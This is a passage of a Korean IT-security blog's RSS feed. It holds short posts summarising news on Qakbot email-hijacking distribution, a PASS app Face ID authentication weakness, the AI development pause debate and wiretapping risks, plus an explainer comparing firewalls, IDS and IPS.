유포중&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;칵봇(Qakbot) 악성코드가 기존의 이메일을 회신 및 전달하는 형태로 악성 PDF 파일을 첨부해 유포되는 정황이 확인됐다. 뱅킹형 악성코드로 알려진 칵봇은 다양한 매개체를 통해 지속해서 유포되&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;안랩 블로그(ASEC),&amp;nbsp;이메일 하이재킹을 통해 Qakbot 악성코드 국내 유포 중, &lt;a href=&quot;https://asec.ahnlab.com/ko/51109/&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://asec.ahnlab.com/ko/51109/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;이메일 하이재킹을 통해 Qakbot 악성코드 국내 유포 중 - ASEC BLOG&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;AhnLab Security Emergency response Center(ASEC)에서는 기존의 이메일을 이용(회신/전달)하는 형태로 악성 PDF파일을 첨부하여 Qakbot 악성코드가 유포되는 정황을 확인하였다.뱅킹형 악성코드로 알려진 Qakbot&quot; data-og-host=&quot;asec.ahnlab.com&quot; data-og-source-url=&quot;https://asec.ahnlab.com/ko/51109/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cY8dBK/hySe676SgK/wmIT5D8EmlwzudCYC8BITK/img.png?width=1200&amp;amp;height=627&amp;amp;face=0_0_1200_627,https://scrap.kakaocdn.net/dn/CEut0/hySeWYHAP6/HfK6iGM8i9T9OivZN8kJok/img.png?width=777&amp;amp;height=691&amp;amp;face=0_0_777_691,https://scrap.kakaocdn.net/dn/daMoOj/hySeVZNxcB/mkAt6eBw4PzBo1ATWlUU60/img.png?width=825&amp;amp;height=563&amp;amp;face=0_0_825_563&quot; data-og-url=&quot;http://asec.ahnlab.com/ko/51109/&quot;&gt;&lt;a href=&quot;http://asec.ahnlab.com/ko/51109/&quot; target=&quot;_blank&quot; data-source-url=&quot;https://asec.ahnlab.com/ko/51109/&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cY8dBK/hySe676SgK/wmIT5D8EmlwzudCYC8BITK/img.png?width=1200&amp;amp;height=627&amp;amp;face=0_0_1200_627,https://scrap.kakaocdn.net/dn/CEut0/hySeWYHAP6/HfK6iGM8i9T9OivZN8kJok/img.png?width=777&amp;amp;height=691&amp;amp;face=0_0_777_691,https://scrap.kakaocdn.net/dn/daMoOj/hySeVZNxcB/mkAt6eBw4PzBo1ATWlUU60/img.png?width=825&amp;amp;height=563&amp;amp;face=0_0_825_563')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;이메일 하이재킹을 통해 Qakbot 악성코드 국내 유포 중 - ASEC BLOG&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;AhnLab Security Emergency response Center(ASEC)에서는 기존의 이메일을 이용(회신/전달)하는 형태로 악성 PDF파일을 첨부하여 Qakbot 악성코드가 유포되는 정황을 확인하였다.뱅킹형 악성코드로 알려진 Qakbot&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;asec.ahnlab.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/618</guid>
      <comments>https://jennana.tistory.com/618#entry618comment</comments>
      <pubDate>Mon, 17 Apr 2023 20:57:40 +0900</pubDate>
    </item>
    <item>
      <title>[네트워크 보안 기술] 침입 방지 시스템 (IPS, Intrusion Prevention System)</title>
      <link>https://jennana.tistory.com/617</link>
      <description>&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #FFFFFF;&quot;&gt;침입 방지 시스템&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #FFFFFF;&quot;&gt; (IPS, Intrusion Prevention System)&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;방화벽과 IDS(침입탐지시스템)과 같은 네트워크 기반의 차단 솔루션을 논리적으로 결합한 시스템&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;color: #000000;&quot;&gt;비정상적인 트래픽을 능동적으로 차단하고 격리하는 등 방어 조치를 취하는 보안 솔루션&lt;/span&gt;&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;span style=&quot;color: #000000;&quot;&gt;IDS(Intrusion &lt;b&gt;Detection&lt;/b&gt; System) 침입에 대해 탐지&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;color: #000000;&quot;&gt;IPS(Intrusion &lt;b&gt;Prevention&lt;/b&gt; System) 침입에 대해 탐지 및 &lt;u&gt;차단&lt;/u&gt;까지 수행&lt;/span&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;800&quot; data-origin-height=&quot;669&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/k2F2t/btrWitEGvEc/o0WtS6PkFyQ8mjJXgdqA5K/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/k2F2t/btrWitEGvEc/o0WtS6PkFyQ8mjJXgdqA5K/img.jpg&quot; data-alt=&quot;사진 출처 : https://www.wallarm.com/what/intrusion-prevention-system&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/k2F2t/btrWitEGvEc/o0WtS6PkFyQ8mjJXgdqA5K/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fk2F2t%2FbtrWitEGvEc%2Fo0WtS6PkFyQ8mjJXgdqA5K%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;669&quot; data-origin-width=&quot;800&quot; data-origin-height=&quot;669&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;사진 출처 : https://www.wallarm.com/what/intrusion-prevention-system&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;방화벽, IDS, IPS 비교&lt;/b&gt;&lt;/p&gt;&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-style=&quot;style13&quot; data-ke-align=&quot;alignLeft&quot;&gt;&lt;tbody&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 16.6667%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;구분&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 26.0853%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;방화벽(Firewall)&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 28.5659%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;침입탐지시스템(IDS)&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 28.6821%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;침입방지시스템(IPS)&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 16.6667%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;목적&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 26.0853%; height: 20px; text-align: justify;&quot;&gt;탐지 및 차단&lt;/td&gt;&lt;td style=&quot;width: 28.5659%; height: 20px; text-align: justify;&quot;&gt;침입 여부 탐지&lt;/td&gt;&lt;td style=&quot;width: 28.6821%; height: 20px; text-align: justify;&quot;&gt;침입 여부 탐지 및 대응&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 40px;&quot;&gt;&lt;td style=&quot;width: 16.6667%; height: 40px; text-align: center;&quot;&gt;&lt;b&gt;분석방법&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 26.0853%; height: 40px; text-align: justify;&quot;&gt;수동적 차단&lt;br&gt;내부망 보호&lt;br&gt;패킷 헤더만 검사&lt;/td&gt;&lt;td style=&quot;width: 28.5659%; height: 40px; text-align: justify;&quot;&gt;시그니처 기반 패턴 매칭&lt;br&gt;알려진 공격패턴 감지&lt;br&gt;패킷 데이터 전부 검사&lt;/td&gt;&lt;td style=&quot;width: 28.6821%; height: 40px; text-align: justify;&quot;&gt;Rule 기반&lt;br&gt;비정상 행위 방지&lt;br&gt;&lt;span style=&quot;background-color: #F9F9F9;&quot;&gt;패킷 데이터 전부 검사&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 16.6667%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;연결방식&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 26.0853%; height: 20px; text-align: justify;&quot;&gt;In-Line&lt;/td&gt;&lt;td style=&quot;width: 28.5659%; height: 20px; text-align: justify;&quot;&gt;Mirroring&lt;/td&gt;&lt;td style=&quot;width: 28.6821%; height: 20px; text-align: justify;&quot;&gt;In-Line&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 16.6667%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;OSI Layer&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 26.0853%; height: 20px; text-align: justify;&quot;&gt;3~4 (IP/Port 기반)&lt;/td&gt;&lt;td style=&quot;width: 28.5659%; height: 20px; text-align: justify;&quot;&gt;3~7&lt;/td&gt;&lt;td style=&quot;width: 28.6821%; height: 20px; text-align: justify;&quot;&gt;3~7&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 16.6667%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;장애 대응&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 26.0853%; height: 20px; text-align: justify;&quot;&gt;이중화(HA 구성)&lt;/td&gt;&lt;td style=&quot;width: 28.5659%; height: 20px; text-align: justify;&quot;&gt;서비스 영향 없음&lt;/td&gt;&lt;td style=&quot;width: 28.6821%; height: 20px; text-align: justify;&quot;&gt;Bypass mode&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 16.6667%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;시스템 부하&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 26.0853%; height: 20px; text-align: justify;&quot;&gt;트래픽 지연&lt;/td&gt;&lt;td style=&quot;width: 28.5659%; height: 20px; text-align: justify;&quot;&gt;부하 없음&lt;/td&gt;&lt;td style=&quot;width: 28.6821%; height: 20px; text-align: justify;&quot;&gt;트래픽 지연&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;[참조]&lt;br&gt;양대일, 네트워크 해킹과 보안: 정보 보안 개론과 실습, 한빛아카데미&lt;br&gt;&lt;a href=&quot;https://ko.m.wikipedia.org/wiki/침입_차단_시스템&quot; target=&quot;_self&quot;&gt;&lt;span&gt;https://ko.m.wikipedia.org/wiki/침입_차단_시스템&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;</description>
      <category>네트워크  /네트워크 보안 방법</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/617</guid>
      <comments>https://jennana.tistory.com/617#entry617comment</comments>
      <pubDate>Sat, 15 Apr 2023 23:19:58 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] '생체인증' 보안 구멍... 아이폰 '안면인식' 해킹 주의보</title>
      <link>https://jennana.tistory.com/616</link>
      <description>&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;707&quot; data-origin-height=&quot;725&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bhOVqo/btr9A4ziPuC/2cqVEFPefcUWjpem7WCrb1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bhOVqo/btr9A4ziPuC/2cqVEFPefcUWjpem7WCrb1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bhOVqo/btr9A4ziPuC/2cqVEFPefcUWjpem7WCrb1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbhOVqo%2Fbtr9A4ziPuC%2F2cqVEFPefcUWjpem7WCrb1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;707&quot; height=&quot;725&quot; data-origin-width=&quot;707&quot; data-origin-height=&quot;725&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #009A87;&quot;&gt;기사 요약 :&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;국내 이동통신사의 인증 앱인 '패스(PASS)'가 아이폰에서 안면인식(페이스아이디) 기능으로 화면을 들여다보면 자동으로 인증된다는 허점을 이용해서 해커들이 인증요청을 보내 범죄에 악용할 수 있다고 해서 비밀번호와 같은 추가적인 보안 체계가 필요하다고 한다. &lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;편리성을 강조하다가 보안이 위협되고 있다. 빠른 조치가 필요해 보인다.&lt;br&gt;&amp;nbsp;&lt;br&gt;[악용 사례]&lt;br&gt;- 갑작스럽게 PASS 앱 알람 팝업이 와서 팝업창을 클릭하는 순간 자동으로 인증이 완료되어 확인 결과 누군가가 특정 사이트 아이디를 확인 사실을 알게 됨.&lt;br&gt;&amp;nbsp;&lt;br&gt;- PASS : SK텔레콤, KT, LG 유플러스 등 국내 이동통신 3사가 개발한 간편 인증 앱. 11월 기준으로 앱 사용자는 3600만 명, 모바일 운전면허 확인 서비스 이용자는 470만 명. PASS에서 사용 가능한 기능 : 1) 모바일 주민등록증, 운전면허증 2) 온라인 서류발급, 3) 금융거래, 4) 계약서 전자서명 등에 이용.&lt;br&gt;  SK텔레콤은 3월 초 추가 인증 수단인 '패스키' 도입 됨. 반면, KT, LG유플러스는 PASS 추가 인증 안돼서 무방비 상태&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;신희강, 김병욱 기자, '생체인증' 보안 구멍... 아이폰 '안면인식' 해킹 주의보, 뉴데일리경제, &lt;a href=&quot;https://biz.newdaily.co.kr/site/data/html/2023/04/10/2023041000237.html&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://biz.newdaily.co.kr/site/data/html/2023/04/10/2023041000237.html&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;'생체인증' 보안 구멍... 아이폰 '안면인식' 해킹 주의보&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;#아이폰을 사용하는 A씨는 최근 황당한 일을 겪었다. 갑작스러운 PASS 앱 알림 팝업이 왔기 때문이다. 안면인식 기능을 사용하는 터라 팝업창을 클릭하는 순간 자동으로 인증이 완료됐다는 문구&quot; data-og-host=&quot;biz.newdaily.co.kr&quot; data-og-source-url=&quot;https://biz.newdaily.co.kr/site/data/html/2023/04/10/2023041000237.html&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bEo633/hySe9DyHLu/jAuhACZjfK0A4N89KNKwB0/img.jpg?width=600&amp;amp;height=337&amp;amp;face=123_183_200_267&quot; data-og-url=&quot;https://biz.newdaily.co.kr/site/data/html/2023/04/10/2023041000237.html&quot;&gt;&lt;a href=&quot;https://biz.newdaily.co.kr/site/data/html/2023/04/10/2023041000237.html&quot; target=&quot;_blank&quot; data-source-url=&quot;https://biz.newdaily.co.kr/site/data/html/2023/04/10/2023041000237.html&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bEo633/hySe9DyHLu/jAuhACZjfK0A4N89KNKwB0/img.jpg?width=600&amp;amp;height=337&amp;amp;face=123_183_200_267')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;'생체인증' 보안 구멍... 아이폰 '안면인식' 해킹 주의보&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;#아이폰을 사용하는 A씨는 최근 황당한 일을 겪었다. 갑작스러운 PASS 앱 알림 팝업이 왔기 때문이다. 안면인식 기능을 사용하는 터라 팝업창을 클릭하는 순간 자동으로 인증이 완료됐다는 문구&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;biz.newdaily.co.kr&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/616</guid>
      <comments>https://jennana.tistory.com/616#entry616comment</comments>
      <pubDate>Fri, 14 Apr 2023 14:55:31 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 워즈니악 &amp;ldquo;AI개발 6개월 중단을&amp;rdquo;&amp;hellip; 빌 게이츠 &amp;ldquo;문제 해결책 아냐&amp;rdquo;</title>
      <link>https://jennana.tistory.com/615</link>
      <description>&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;2074&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c7GAfb/btr9sgU3ID0/TWlYbf6XgvXXVfgoQOEsuK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c7GAfb/btr9sgU3ID0/TWlYbf6XgvXXVfgoQOEsuK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c7GAfb/btr9sgU3ID0/TWlYbf6XgvXXVfgoQOEsuK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc7GAfb%2Fbtr9sgU3ID0%2FTWlYbf6XgvXXVfgoQOEsuK%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1080&quot; height=&quot;2074&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;2074&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;blockquote data-ke-style=&quot;style3&quot;&gt;* 생성형 AI(Generative AI) : &lt;br&gt;이용자의 특정 요구에 따라 결과를 생성해 내는 인공지능. 데이터 원본을 통한 학습으로 소설, 시, 이미지, 비디오, 코딩, 미술 등 다양한 콘텐츠 생성에 이용됨.&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 : &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;최근 생성형 AI 챗GPT가 폭발적인 인기와 변화를 불러일으키면서 IT업계에서는 AI 개발을 6개월간 중단해야 한다는 의견이 나와서 찬반으로 논란이 팽팽하게 맞서고 있다.&lt;br&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;일단 AI 개발을 일시 중단해야 한다고 주장하는 사람들(스티브 워즈니악, 일론 머스크, 유발 하라리)은 AI 기술이 인류를 대체하고 인류 문명에 대한 통제력을 상실시킬 가능성을 우려하고 있다.&lt;br&gt;반면 개발을 지속해야 한다고 주장을 내놓는 사람들(빌 게이츠. 안 르쿤, 앤드루 응)은 AI기술은 유익한 기술이며, AI 개발을 중단해도 해당 문제가 해결되는 않는다고 주장하고 있다.&lt;br&gt;또한 일부 사람들은 AI 시장 주도권을 위해 후발주자들이 개발 중단을 요청하는 것이 아닌가 하는 우려도 있다.&amp;nbsp;&lt;br&gt;&lt;br&gt;이제 AI는 시대적 흐름이 되어버렸고 이 기술로 인해서 앞으로의 사회는 많이 변화할 거 같다. 찬성하는 사람들과 반대하는 사람들 모두가 AI의 파급력을 예상하고 있기 때문에 이러한 다양한 의견이 충돌하는 것 같다. 현재 상황에서 어떤 결론이 도출될지 주목된다.&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;남해정 기자, 워즈니악 “AI개발 6개월 중단을”… 빌 게이츠 “문제 해결책 아냐”, 동아일보, &lt;a href=&quot;https://n.news.naver.com/article/020/0003489981?sid=105&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://n.news.naver.com/article/020/0003489981?sid=105&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;워즈니악 “AI개발 6개월 중단을”… 빌 게이츠 “문제 해결책 아냐”&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;“GPT-4를 능가하는 인공지능(AI) 시스템의 개발을 6개월간 중단해야 한다.”(스티브 워즈니악 애플 공동창업자 등) “AI 개발을 일시 중단한다고 문제가 해결되지 않는다.”(빌 게이츠 마이크로소&quot; data-og-host=&quot;n.news.naver.com&quot; data-og-source-url=&quot;https://n.news.naver.com/article/020/0003489981?sid=105&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/8cCae/hySe07xCeg/SCb1ARuzOkqc3Z7MezWyKk/img.jpg?width=640&amp;amp;height=914&amp;amp;face=67_97_294_883&quot; data-og-url=&quot;https://n.news.naver.com/article/020/0003489981&quot;&gt;&lt;a href=&quot;https://n.news.naver.com/article/020/0003489981&quot; target=&quot;_blank&quot; data-source-url=&quot;https://n.news.naver.com/article/020/0003489981?sid=105&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/8cCae/hySe07xCeg/SCb1ARuzOkqc3Z7MezWyKk/img.jpg?width=640&amp;amp;height=914&amp;amp;face=67_97_294_883')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;워즈니악 “AI개발 6개월 중단을”… 빌 게이츠 “문제 해결책 아냐”&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;“GPT-4를 능가하는 인공지능(AI) 시스템의 개발을 6개월간 중단해야 한다.”(스티브 워즈니악 애플 공동창업자 등) “AI 개발을 일시 중단한다고 문제가 해결되지 않는다.”(빌 게이츠 마이크로소&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;n.news.naver.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/615</guid>
      <comments>https://jennana.tistory.com/615#entry615comment</comments>
      <pubDate>Thu, 13 Apr 2023 21:25:44 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 미국의 한국 도&amp;middot;감청 의혹 파장! 해킹을 통한 도&amp;middot;감청 위협은 얼마나?</title>
      <link>https://jennana.tistory.com/614</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;970&quot; data-origin-height=&quot;512&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdlg5x/btr9zNdNPDB/kqbkachPDEuFKkNj2HVpa1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdlg5x/btr9zNdNPDB/kqbkachPDEuFKkNj2HVpa1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdlg5x/btr9zNdNPDB/kqbkachPDEuFKkNj2HVpa1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbdlg5x%2Fbtr9zNdNPDB%2FkqbkachPDEuFKkNj2HVpa1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;970&quot; height=&quot;512&quot; data-origin-width=&quot;970&quot; data-origin-height=&quot;512&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;최근 미국의 우크라이나 전쟁관련해서 기밀 문건이 SNS으로 유출이 되어 이슈가 된 가운데 한국 정부의 대화도 도&lt;span style=&quot;color: #333333;&quot;&gt;&amp;middot;감청된 정황이 있어서 논란이 되고 있다. 우리의 일상생활에서도 도청과 녹취의 위협이 가정용 제품 해킹, 동작 센서 이용, 음성 스피커 해킹과 같은 취약점이 주변에 도사리고 있기 때문에 이러한 위협을 예방하기 위해서는 전문가들은 센서와 스피커 사이에 충분한 거리를 유지하고, 스피커 진동이 센서에 감지되지 않도록 만드는 조치를 취해야 한다고 한다.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;[ 용어 정리 ]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 도청 : 의도를 가지고 특정 공간, 특정 사람을 지목해 이야기, 회의 내용, 전화 통화를 몰래 엿듣거나 녹음하는 일&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 감청 : 도청보다 넓은 범위로 기밀을 보호하거나 수사 따위에 필요한 참고 자료를 얻기 위하여 통신 내용 전체를 듣는 일&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;[일상생활 도청/감청 예시]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;1. 구글 홈(Google Home) 스피커&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 지난 1월 &lt;/span&gt;&lt;span style=&quot;color: 